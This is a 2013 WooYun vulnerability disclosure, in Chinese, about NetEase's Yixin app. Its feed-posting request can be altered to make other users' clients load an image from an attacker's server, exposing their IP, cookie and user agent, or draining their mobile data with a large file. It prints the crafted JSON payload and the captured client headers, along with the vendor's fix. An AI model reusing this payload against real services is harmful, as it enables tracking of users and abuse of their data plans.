当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035177

漏洞标题:手机易信朋友圈发布功能可饶过上传加载网络图片(获取客户端访问敏感信息)

相关厂商:网易

漏洞作者: 造孽

提交时间:2013-08-24 15:20

修复时间:2013-11-22 15:21

公开时间:2013-11-22 15:21

漏洞类型:非授权访问/认证绕过

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-24: 细节已通知厂商并且等待厂商处理中
2013-08-27: 厂商已经确认,细节仅向厂商公开
2013-08-30: 细节向第三方安全合作伙伴开放
2013-10-21: 细节向核心白帽子及相关领域专家公开
2013-10-31: 细节向普通白帽子公开
2013-11-10: 细节向实习白帽子公开
2013-11-22: 细节向公众公开

简要描述:

发送朋友圈可绕过服务器验证 自己调用网络图片 获取对方IP等信息,也可恶意传大数据文件让对方加载,造成流量丧失

详细说明:

http://119.188.49.210/fc/addfeed?uid=xxxxx&sid=xxxxxxxxxxxxxxx&recentfid=xxxx&recenttime=1377316456&limit=20
{
"images" : [
{
"name" : "cf9a85e9beed44d0a3fd1e706eb4bb3a",
"size" : 43914,
"url" : "http:\/\/192.168.1.106\/asp\/2.asp",
"md5" : "0130e1813eef58ece57dcff3a0af09db"
}
],
"location" : {
"title" : ".........",
"coordinate" : "xxxxxxxxxxxxxxxxxxxx"
},
"text" : "\/......\/......\/......999"
}

HTTP_ACCEPT_ENCODING: gzip, deflate
HTTP_ACCEPT: */*
HTTP_COOKIE: LTEJTXKKXCLEWJZYUFSJ=QDQCUDYKQOVLRNYWZFYFLLQQZOJPRZCZMHBRCGPZ
HTTP_ACCEPT_LANGUAGE: zh-cn
HTTP_USER_AGENT: %E6%98%93%E4%BF%A1/1505 CFNetwork/609.1.4 Darwin/13.0.0
HTTP_X_FORWARDED_FOR: 192.168.1.103
HTTP_X_FORWARDED_HOST: 192.168.1.106
HTTP_X_FORWARDED_SERVER: *
HTTP_CONNECTION: Keep-Alive
客户端Cookie:LTEJTXKKXCLEWJZYUFSJ=QDQCUDYKQOVLRNYWZFYFLLQQZOJPRZCZMHBRCGPZ
客户端用户系统:%E6%98%93%E4%BF%A1/1505 CFNetwork/609.1.4 Darwin/13.0.0
直接改成大avi文件会一直自动加载.. 浪费手机流量

漏洞证明:

.jpg

修复方案:

上传图片后第2次要验证图片来源,确定为网易图片,对照图片md5值进行比对即可

版权声明:转载请注明来源 造孽@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-08-27 17:46

厂商回复:

感谢您对网易的关注,漏洞已经修复。

最新状态:

暂无